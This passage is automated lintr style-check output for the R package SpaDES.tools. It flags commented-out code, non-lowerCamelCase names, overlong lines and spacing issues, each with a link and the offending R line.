\\code{SpatialPolygonsDataFrame}) accepted.\n  ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:357:7:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/R/initialize.R#L357) *style:* **Commented code should be removed.**\n```r\n​#     ext <- extent(agentlocation)\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:359:9:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/R/initialize.R#L359) *style:* **Commented code should be removed.**\n```r\n​#       #            nonNAs <- !is.na(getvalue(probinit))\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:360:9:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/R/initialize.R#L360) *style:* **Commented code should be removed.**\n```r\n​#       nonNAs <- !is.na(getValues(probinit))\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:361:9:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/R/initialize.R#L361) *style:* **Commented code should be removed.**\n```r\n​#       wh.nonNAs <- which(nonNAs)\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:362:9:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/R/initialize.R#L362) *style:* **Commented code should be removed.**\n```r\n​#       #            ProbInit.v <- cumsum(getvalue(probinit)[nonNAs])\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:363:9:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/R/initialize.R#L363) *style:* **Commented code should be removed.**\n```r\n​#       ProbInit.v <- cumsum(getValues(probinit)[nonNAs])\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:365:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/R/initialize.R#L365) *style:* **Commented code should be removed.**\n```r\n​#         ran <- runif(numagents,0,1)\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:366:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/R/initialize.R#L366) *style:* **Commented code should be removed.**\n```r\n​#         fI <- findInterval(ran, ProbInit.v)+1\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:367:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/R/initialize.R#L367) *style:* **Commented code should be removed.**\n```r\n​#         fI2 <- wh.nonNAs[fI]\n          ^~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:368:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/R/initialize.R#L368) *style:* **Commented code should be removed.**\n```r\n​#         last.ran <- runif(numagents,0,1)\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:369:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/R/initialize.R#L369) *style:* **Commented code should be removed.**\n```r\n​#         last.fI <- findInterval(last.ran, ProbInit.v)+1\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:370:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/R/initialize.R#L370) *style:* **Commented code should be removed.**\n```r\n​#         last.fI2 <- wh.nonNAs[last.fI]\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:372:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/R/initialize.R#L372) *style:* **Commented code should be removed.**\n```r\n​#         #                va <- getvalue(probinit)[nonNAs]\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:373:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/R/initialize.R#L373) *style:* **Commented code should be removed.**\n```r\n​#         va <- getValues(probinit)[nonNAs]\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:374:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/R/initialize.R#L374) *style:* **Commented code should be removed.**\n```r\n​#         ran <- runif(length(va), 0, 1)\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:375:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/R/initialize.R#L375) *style:* **Commented code should be removed.**\n```r\n​#         fI2 <- wh.nonNAs[ran<va]\n          ^~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:377:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/R/initialize.R#L377) *style:* **Commented code should be removed.**\n```r\n​#         last.ran <- runif(length(fI2), 0, 1)\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:378:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/R/initialize.R#L378) *style:* **Commented code should be removed.**\n```r\n​#         last.fI <- findInterval(last.ran, ProbInit.v) + 1\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:379:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/R/initialize.R#L379) *style:* **Commented code should be removed.**\n```r\n​#         last.fI2 <- wh.nonNAs[last.fI]\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:381:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/R/initialize.R#L381) *style:* **Commented code should be removed.**\n```r\n​#         #                last.ran <- runif(length(fI2),0,1)\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:382:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/R/initialize.R#L382) *style:* **Commented code should be removed.**\n```r\n​#         #                last.fI2 <- wh.nonNAs[last.ran<va]\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:385:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/R/initialize.R#L385) *style:* **Commented code should be removed.**\n```r\n​#         position <- xyFromCell(agentlocation,fI2,spatial = TRUE)\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:387:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/R/initialize.R#L387) *style:* **Commented code should be removed.**\n```r\n​#         position <- coordinates(agentlocation)\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:389:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/R/initialize.R#L389) *style:* **Commented code should be removed.**\n```r\n​#         stop(\"need raster layer or Spatial Points object\")\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:391:9:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/R/initialize.R#L391) *style:* **Commented code should be removed.**\n```r\n​#       numagents <- length(position)\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:399:13:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/R/initialize.R#L399) *style:* **Commented code should be removed.**\n```r\n​#           colnames(xy) = c(\"x\", \"y\")\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:400:13:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/R/initialize.R#L400) *style:* **Commented code should be removed.**\n```r\n​#           position <- SpatialPoints(xy)\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:401:13:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/R/initialize.R#L401) *style:* **Commented code should be removed.**\n```r\n​#           position <- SpatialPoints(sampleRandom(agentlocation, numagents, xy = TRUE, sp = TRUE))\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:403:13:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/R/initialize.R#L403) *style:* **Commented code should be removed.**\n```r\n​#           sam <- sample(1:length(agentlocation),numagents)\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:404:13:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/R/initialize.R#L404) *style:* **Commented code should be removed.**\n```r\n​#           position <- SpatialPoints(agentlocation[sam,])\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:406:13:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/R/initialize.R#L406) *style:* **Commented code should be removed.**\n```r\n​#           stop(\"need raster layer or Spatial Points object\")\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:413:13:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/R/initialize.R#L413) *style:* **Commented code should be removed.**\n```r\n​#           position <- SpatialPoints(agentlocation)\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:415:13:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/R/initialize.R#L415) *style:* **Commented code should be removed.**\n```r\n​#           stop(\"need raster layer or Spatial Points object\")\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:417:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/R/initialize.R#L417) *style:* **Commented code should be removed.**\n```r\n​#         numagents <- length(position)\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:425:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/R/initialize.R#L425) *style:* **Commented code should be removed.**\n```r\n​#         numagents <- length(position)\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:429:7:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/R/initialize.R#L429) *style:* **Commented code should be removed.**\n```r\n​#     stop(\"Need to provide agentlocation, which can be a map layer\")\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:431:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/R/initialize.R#L431) *style:* **Commented code should be removed.**\n```r\n​#   heading1 <- runif(numagents, 0, 360)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:432:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/R/initialize.R#L432) *style:* **Commented code should be removed.**\n```r\n​#   distance <- runif(numagents, 0.1, 10)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:434:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/R/initialize.R#L434) *style:* **Commented code should be removed.**\n```r\n​#   .Object@ID <- as.character(1:numagents)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:435:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/R/initialize.R#L435) *style:* **Commented code should be removed.**\n```r\n​#   .Object@spatial <- position\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:436:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/R/initialize.R#L436) *style:* **Commented code should be removed.**\n```r\n​#   .Object@heading <- heading1\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:437:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/R/initialize.R#L437) *style:* **Commented code should be removed.**\n```r\n​#   .Object@distance <- distance\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:439:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/R/initialize.R#L439) *style:* **Commented code should be removed.**\n```r\n​#   return(.Object)\n    ^~~~~~~~~~~~~~~\n```\n[R/mapReduce.R:53:3:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/R/mapReduce.R#L53) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  BsumVec <- reduced[fullRasterVals] # join\n  ^~~~~~~\n```\n[R/neighbourhood.R:114:21:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/R/neighbourhood.R#L114) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                    match.adjacent = FALSE, cutoff.for.data.table = 2e3,\n                    ^~~~~~~~~~~~~~\n```\n[R/neighbourhood.R:114:45:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/R/neighbourhood.R#L114) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                    match.adjacent = FALSE, cutoff.for.data.table = 2e3,\n                                            ^~~~~~~~~~~~~~~~~~~~~\n```\n[R/neighbourhood.R:233:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/R/neighbourhood.R#L233) *style:* **Lines should not be more than 100 characters.**\n```r\n​              ((adj[, \"from\"] %% numCol + adj[, \"to\"] %% numCol) == 1)) # | #right & left edge cells, with neighbours wrapped\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/neighbourhood.R:238:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/R/neighbourhood.R#L238) *style:* **Lines should not be more than 100 characters.**\n```r\n​              ((adj[, \"from\"] %% numCol + adj[, \"to\"] %% numCol) == 1)) # | #right & left edge cells, with neighbours wrapped\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/neighbourhood.R:297:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/R/neighbourhood.R#L297) *style:* **Lines should not be more than 100 characters.**\n```r\n​              ((from %% numCol + to %% numCol) == 1))# | #right & left edge cells, with neighbours wrapped\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/neighbourhood.R:808:29:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/R/neighbourhood.R#L808) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​setGeneric(\"wrap\", function(X, bounds, withHeading) {\n                            ^\n```\n[R/neighbourhood.R:817:25:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/R/neighbourhood.R#L817) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  definition = function(X, bounds) {\n                        ^\n```\n[R/neighbourhood.R:834:25:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/R/neighbourhood.R#L834) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  definition = function(X, bounds) {\n                        ^\n```\n[R/neighbourhood.R:844:25:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/R/neighbourhood.R#L844) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  definition = function(X, bounds) {\n                        ^\n```\n[R/neighbourhood.R:845:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/R/neighbourhood.R#L845) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    X <- wrap(X, bounds = extent(bounds))\n    ^\n```\n[R/neighbourhood.R:854:25:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/R/neighbourhood.R#L854) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  definition = function(X, bounds) {\n                        ^\n```\n[R/neighbourhood.R:855:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/R/neighbourhood.R#L855) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    X <- wrap(X, bounds = extent(bounds))\n    ^\n```\n[R/neighbourhood.R:864:25:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/R/neighbourhood.R#L864) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  definition = function(X, bounds) {\n                        ^\n```\n[R/neighbourhood.R:867:7:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/R/neighbourhood.R#L867) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​      X <- wrap(X, bounds = extent(bounds))\n      ^\n```\n[R/neighbourhood.R:879:25:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/R/neighbourhood.R#L879) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  definition = function(X, bounds, withHeading) {\n                        ^\n```\n[R/neighbourhood.R:904:25:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/R/neighbourhood.R#L904) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  definition = function(X, bounds, withHeading) {\n                        ^\n```\n[R/neighbourhood.R:905:7:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/R/neighbourhood.R#L905) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​      X <- wrap(X, bounds = extent(bounds), withHeading = withHeading)\n      ^\n```\n[R/neighbourhood.R:914:25:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/R/neighbourhood.R#L914) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  definition = function(X, bounds, withHeading) {\n                        ^\n```\n[R/neighbourhood.R:917:7:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/R/neighbourhood.R#L917) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​      X <- wrap(X, bounds = extent(bounds), withHeading = withHeading)\n      ^\n```\n[R/neighbourhood.R:1054:40:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/R/neighbourhood.R#L1054) *style:* **Commas should always have a space after.**\n```r\n​  cc <- cbind(pureCircle2[, \"x\"] - xy[,\"x\"], pureCircle2[, \"y\"] - xy[, \"y\"])\n                                       ^\n```\n[R/probability.R:41:35:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/R/probability.R#L41) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    1 / sqrt(var * 2 * pi) * exp(-((theta - mu + 2 * pi * k) ^ 2) / (2 * var))\n                                  ^\n```\n[R/probability.R:44:3:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/R/probability.R#L44) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  Next <- term(theta, mu, var, k)\n  ^~~~\n```\n[R/probability.R:45:3:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/R/probability.R#L45) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  Last <- Next\n  ^~~~\n```\n[R/RcppExports.R:68:20:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/R/RcppExports.R#L68) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​runifC <- function(N) {\n                   ^\n```\n[R/RcppExports.R:71:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/R/RcppExports.R#L71) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[R/SELES.R:53:23:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/R/SELES.R#L53) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​numAgents <- function(N, probInit) {\n                      ^\n```\n[R/splitRaster.R:116:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/R/splitRaster.R#L116) *style:* **Lines should not be more than 100 characters.**\n```r\n​      clusterApplyLB(cl = cl, x = seq_along(extents), fun = croppy, e = extents, r = r, path = path, rType = rType)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/spread.R:538:8:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/R/spread.R#L538) *style:* **Commented code should be removed.**\n```r\n​      #isNASpreadProb <- is.na(spreadProb[])\n       ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/spread.R:540:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/R/spread.R#L540) *style:* **Commented code should be removed.**\n```r\n​      #   isNASpreadProb <- is.na(spreadProb[])\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/spread.R:541:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/R/spread.R#L541) *style:* **Commented code should be removed.**\n```r\n​      #   spreadProb[isNASpreadProb] <- 0L\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/spread.R:942:41:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/R/spread.R#L942) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​              notDupsEvents <- notDups[-(1:(nrSpreads - nrPotentials))]\n                                        ^\n```\n[R/spread2.R:5:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/R/spread2.R#L5) *style:* **Lines should not be more than 100 characters.**\n```r\n​                           \"quantityAdj\", \"quantityAdj2\", \"state\", \"size\", \"tooBigByNCells\", \"V1\", \"proportion\"\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/spread2.R:674:12:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/R/spread2.R#L674) *style:* **Commented code should be removed.**\n```r\n​          #pureCircle <- unique(pureCircle)\n           ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/spread2.R:759:13:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/R/spread2.R#L759) *style:* **Commented code should be removed.**\n```r\n​          # colnamesDtPot <- colnames(dtPotential)\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/spread2.R:760:13:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/R/spread2.R#L760) *style:* **Commented code should be removed.**\n```r\n​          # ll <-  lapply(colnamesDtPot, function(x) dtPotential[[x]][!spreadProbNA])\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/spread2.R:761:13:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/R/spread2.R#L761) *style:* **Commented code should be removed.**\n```r\n​          # names(ll) <- colnamesDtPot\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/spread2.R:762:13:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/R/spread2.R#L762) *style:* **Commented code should be removed.**\n```r\n​          # dtPotential <- as.data.table(ll)\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/spread2.R:772:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/R/spread2.R#L772) *style:* **Lines should not be more than 100 characters.**\n```r\n​                                                                   .I[sample.int(length(numNeighs), size = numNeighs, prob = spreadProbRel)],\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/spread2.R:787:7:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/R/spread2.R#L787) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​      NAaSP <- !is.na(actualSpreadProb)\n      ^~~~~\n```\n[R/spread2.R:789:42:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/R/spread2.R#L789) *style:* **Commas should always have a space after.**\n```r\n​        dtPotential <- dtPotential[NAaSP,]\n                                         ^\n```\n[R/spread2.R:830:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/R/spread2.R#L830) *style:* **Lines should not be more than 100 characters.**\n```r\n​        # this is to prevent overlap within an event... in some cases, overlap within event is desired, so skip this block\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/spread2.R:848:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/R/spread2.R#L848) *style:* **Lines should not be more than 100 characters.**\n```r\n​        #successCells <- na.omit(successCells[!dupsWithinDtPotential]) # remove the dupsWithinDtPotential\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/spread2.R:848:10:](https://github.com/PredictiveEcology/SpaDES.tools/blob/14c21b222d825b0a92b4885471be902e25bb5b62/R/spread2.R#L848) *style:* **Commented code should be removed.**\n```r\n​        #successCells <- na.omit(successCells[!dupsWithinDtPotential]) # remove the dupsWithinDtPotential\n         